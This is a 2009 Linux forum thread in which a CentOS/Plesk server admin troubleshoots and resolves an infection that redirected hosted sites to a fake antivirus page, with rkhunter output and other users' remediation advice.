LinuxQuestions.org
Share your knowledge at the LQ Wiki.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 09-30-2009, 08:37 PM   #1
Dragnovich
LQ Newbie
 
Registered: Sep 2009
Posts: 5

Rep: Reputation: 0
Virus in a server? Malware running randomly in all server sites.


Hello I have one CentOs machine with Plesk 8.6 (preinstalled from the planet).

The sites on that server, are randomly (and frecuently) serving a page redirect, that points to a malware site.

http://antispywaretotalscan9.com/sca...LjI4Ng0MaA%3DN

that claims to be a antivirus software but, really is a troyan virus.

The number from: ...totalscanX.com/... changes from 0 to 9, even if you try some times the site is down (it seems that it changes ips and using free ip proxies and free dns servers). When opened the site, It get very persistent on making the user, no other choice to click in the downlad and install button (normal users don't realize that is a WEBSITE and the messages are Browser Alerts), and the way to avoid it, is just hitting the back button.

Ok this is how it is working:

1) runs randomly, in randomly sites, pages and scripts. IE: I was editing with vi a file with <?php phpinfo(); ?> and when I tested the page got the malware redirection).
2) the script DOES NOT MODIFY or affect the file requested so Im worring about the file is been running server wide.
3) the malware page goes up and down also randomly.
4) I was detected the first time a suspicious Tomcat process, and the virus was displayed very often, once I shout down tomcat the propagation slowed down nearly to nothing (but stils).
5) is not a local machine virus (windows), I checked the pages from many machines, in many networks and always get it after a while.

What I have done to test?...

First I think my FTP account was compromised, so I changed my passwords. Verify the integrity of all my files and find nothing...
After a while I start getting again the malware redirctions on my site, so I start monitoring all server FTP access logs, to see if the malware, connects, uploads, and after some time, it deletes it self. But after that, I find 0 ftp access and getting the malware, from the same phpinfo file.

I also try PHP/apache configuration files, to see if there are suspicius files that append in each serverd, page but got nothing.

I checked all server Processes and find nothing suspicious

A friend told me maybe the kernel was corrupted? but how to find if it was modified?

Any ideas what more to do?
 
Old 09-30-2009, 08:56 PM   #2
jalalski
LQ Newbie
 
Registered: Aug 2004
Posts: 9

Rep: Reputation: 1
Two options

In my opinion, you only have two options:

1. completely wipe the machine and do a new install, with new passwords, everything.

2. Employ an expensive security expert to audit the machine and, if possible, fix it.

A security expert will probably find the source of the problem and then insist that you do a reinstall anyway, so you might as well skip that and do it yourself.

(if you are calling a file containing phpinfo() and getting a redirect to another site, it indicates either a .htaccess redirect or url rewrite or a modified apache installation).

good luck.
 
Old 09-30-2009, 09:00 PM   #3
gmartin
Member
 
Registered: Mar 2003
Location: PA
Distribution: Slackware 13.37 Linux Reg # 341245
Posts: 285

Rep: Reputation: 40
Not too likely, but it's possible you have been rooted. It can be impossible to detect. But there are some good tools to try detection. See here and here

Most of those tools should be run from a LiveCD so the rootkit isn't active.

Also, on possible infection vectors, are you running a CMS that could have a vulnerability? I've seen php apps that you could drive a truck through.
 
Old 09-30-2009, 11:55 PM   #4
Dragnovich
LQ Newbie
 
Registered: Sep 2009
Posts: 5

Original Poster
Rep: Reputation: 0
Yes the posibility of reinstallation is taken care.. but it will be as the last resource...

Ok I run the the khunter and besides some warnings (that seems to warn every one that has runned it from a centos/plesk server, as seen in a google search) there's nothing suspect.

this is what I get...
[21:14:49] /usr/bin/GET [ Warning ]
[21:14:49] Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
[21:14:49] /usr/bin/groups [ Warning ]
[21:14:49] Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
[21:14:50] /usr/bin/ldd [ Warning ]
[21:14:50] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
[21:14:55] /usr/bin/whatis [ Warning ]
[21:14:56] Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
[21:14:57] /sbin/ifdown [ Warning ]
[21:14:57] Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
[21:14:57] /sbin/ifup [ Warning ]
[21:14:58] Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
[21:16:07] Checking '/etc/xinetd.d/ftp_psa' for enabled services [ Warning ]
[21:16:07] Checking '/etc/xinetd.d/poppassd_psa' for enabled services [ Warning ]
[21:16:07] Checking '/etc/xinetd.d/smtp' for enabled services [ Warning ]
[21:16:07] Checking '/etc/xinetd.d/smtp_psa_alt' for enabled services [ Warning ]
[21:16:07] Checking '/etc/xinetd.d/smtps_psa' for enabled services [ Warning ]
[21:16:08] Checking '/etc/xinetd.d/smtp_telcel' for enabled services [ Warning ]
[21:16:08] Checking '/etc/xinetd.d/submission_psa' for enabled services [ Warning ]
[21:16:08] Checking for enabled xinetd services [ Warning ]
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/ftp_psa
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/poppassd_psa
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/smtp
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_psa_alt
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/smtps_psa
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_telcel
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/submission_psa
[21:16:37] Checking if SSH root access is allowed [ Warning ]
[21:16:37] Warning: The SSH and rkhunter configuration options should be the same:
[21:16:38] Checking for hidden files and directories [ Warning ]
[21:16:38] Warning: Hidden directory found: /dev/.udev
[21:16:38] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression



About the CMS, or PHP backdoor.. Yes it occurs to me that maybe an Apache/php file is been the cause, how ever I dont know any way to know which file is been runned by apache. When searching for apache processes all I get is that is running from the path /usr/bin/httpd

Any ideas?
 
Old 10-01-2009, 11:11 AM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,990
Blog Entries: 54

Rep: Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743
Quote:
Originally Posted by jalalski View Post
completely wipe the machine and do a new install, with new passwords, everything.
Bad advice. If you do that without knowing the cause and hardening against it you're bound to introduce it again.


Quote:
Originally Posted by jalalski View Post
Employ an expensive security expert to audit the machine and, if possible, fix it.
Not necessary unless you know your stuff. Ninetynine percent of the time it'll be vulns that are well known and have been around for some time.
 
Old 10-01-2009, 11:23 AM   #6
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,990
Blog Entries: 54

Rep: Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743
Quote:
Originally Posted by gmartin View Post
Also, on possible infection vectors, are you running a CMS that could have a vulnerability? I've seen php apps that you could drive a truck through.
As I've said before PHP stands for Pretty Horrific Programming and all software the user runs should be regarded as suspect. Quick wins are 0) comparing exact versions of PHP and PHP-based applications with the CVE (or distribution or vendor-issued security bulletins) and 1) grepping webserver access and error logs for "odd" GET/POST requests, errors, tool output (think wget).
 
Old 10-01-2009, 10:11 PM   #7
jalalski
LQ Newbie
 
Registered: Aug 2004
Posts: 9

Rep: Reputation: 1
Quote:
Originally Posted by unSpawn View Post
Bad advice. If you do that without knowing the cause and hardening against it you're bound to introduce it again.
See the second option.

It's the only correct way to treat a possibly rooted machine. If you have the skills to find the source of the infection, then good. If you have the money to pay someone, good.

Otherwise, just reinstall the system, setup new accounts with fresh passwords and check all user space scripts and programs for attack vectors.
 
Old 10-01-2009, 11:05 PM   #8
win32sux
Guru
 
Registered: Jul 2003
Location: Los Angeles
Distribution: Ubuntu
Posts: 9,870

Rep: Reputation: 371Reputation: 371Reputation: 371Reputation: 371
Quote:
Originally Posted by jalalski View Post
See the second option.

It's the only correct way to treat a possibly rooted machine. If you have the skills to find the source of the infection, then good. If you have the money to pay someone, good.

Otherwise, just reinstall the system, setup new accounts with fresh passwords and check all user space scripts and programs for attack vectors.
As unSpawn said, that approach is quite likely to leave you (and your clients) just as vulnerable as before. IMHO, it's extremely irresponsible to put a restored/re-installed system back online without having addressed the vulnerability which was exploited. One doesn't need to be a forensic expert either. Some basic investigative techniques (such as those mentioned by unSpawn) can shed a significant amount of light on what went wrong and why. Once you have a decent theory which is supported by solid evidence, you'll know what needs to be done differently on the new install.

Last edited by win32sux; 10-01-2009 at 11:07 PM.
 
Old 10-03-2009, 09:26 PM   #9
jalalski
LQ Newbie
 
Registered: Aug 2004
Posts: 9

Rep: Reputation: 1
By 'system' I meant the operating system, not the, probably corrupted, data files. Maybe I didn't make that clear.
 
Old 10-05-2009, 02:59 AM   #10
Dragnovich
LQ Newbie
 
Registered: Sep 2009
Posts: 5

Original Poster
Rep: Reputation: 0
Well the problem got solved, for the moment.

Here what happened...

Basically the server was been attacked by some kind of variation of Goscanpark malware or Beladen Attack. I trully dont find ANY reference to a virus like the one I got.

Any way that variations attack a server vulnerability in the default PHP.ini confiruations (as I said the server is leased at ThePlanet so I got it as is (default factory settings).

After a while I mannaged to stop the attack.

Basically the attacker got hack some FTP password accounts (weak passwords I think) in the server and then populates his "malware" in the .JS .PHP Java and .CGI (yes that surpriced me too.. Java? PERL?). the compromised scripts are called from the outside, using POST method so there's no a visible suspicious log access in the logs.

Once the script is running it make all posible scans to search any backdoor opened, if it can execute other scripts, if has ftp access, if has system access, search for Writable directories, etc..., and send back a report, to make the attacker more easy to attack next run.

Basically the script get's by POST the next script it will execute, so is not possible to track what really is been happened, can be a batch of 1000 spam emails, a URL redirection, a fake web page or a Google Addworks supplatation, ANYTHING can happen.

Any way they get runned randomly, and many times but from many diferent IP's. Is very difficult to track this, because many customers had PHP based Open source apps, running and no one can handle the job of TRACK every PHP file served.

The worst part is, that the script attacks server wide, so once the script got runned, it hijack Apache requests SERVER WIDE, and return malicious content on any served page, to the web browsers instead of real web pages, this mean that the attacker script is running in SITE1.COM and reflecting the attacks on ANY site of the server (so if you got a 200+ sites server...)

What did I done?
Install Breakinguard, and made the try for a fail password of 5, to block the IP (just to locate the compromised FTP accounts, but using this method I got just one, of the 3 I located, there could be more), then I changed all server FTP passwords, restrict even more FTP user rigths, remove the use of PHP "execution" functions.

After restricting the PHP the attack stops, and let me track back what happened.

After that, started the complainings of customers that his bugy Open Source Software, stop working, but that is an other history.

I post some resources to know more about this exploits:

The article that show me the light at the end of the tunnel
http://blog.unmaskparasites.com/2009...erver-exploit/

In fact the hole blog is a GOLDEN MINE of knowledge:
http://blog.unmaskparasites.com/

An their Online detection tool is a must:
http://www.unmaskparasites.com/

Other references:
Linux Apache Attack
http://www.uptime.cz/100452-site-a-i...he-Attack.html

Beladen Elusive Web Server Exploit. (information for site owners and hosting providers)
http://blog.unmaskparasites.com/2009...erver-exploit/
 
Old 10-05-2009, 10:08 PM   #11
jalalski
LQ Newbie
 
Registered: Aug 2004
Posts: 9

Rep: Reputation: 1
Glad you got it sorted.

And thanks for posting the info, that will help many.
 
Old 10-06-2009, 03:52 PM   #12
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,990
Blog Entries: 54

Rep: Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743
Quote:
Originally Posted by Dragnovich View Post
Basically the attacker got hack some FTP password accounts (weak passwords I think) in the server and then populates his "malware" in the .JS .PHP Java and .CGI (yes that surpriced me too.. Java? PERL?). the compromised scripts are called from the outside, using POST method so there's no a visible suspicious log access in the logs.
Thanks for the links. Just to be clear the discussions do not point to a direct route into a GNU/Linux server by way of exploiting a weakness but to exploiting vulns in (I'd guess mostly mcrsft) clients used for content upload or editing.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
MyDSL virus and malware scanning extension? roystonlodge DamnSmallLinux 3 10-14-2009 02:07 PM
Where would a virus/malware hide on Slackware? digger95 Slackware 10 02-08-2009 02:23 PM
help removing virus/malware from ubuntu mia_tech Linux - General 7 10-27-2008 12:02 AM
Anti-virus and malware remover advertising Tomermory LQ Suggestions & Feedback 4 06-28-2007 11:04 AM
Running Two Web Sites On the same server Chijtska Linux - Networking 3 06-08-2002 11:13 PM


All times are GMT -5. The time now is 07:03 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration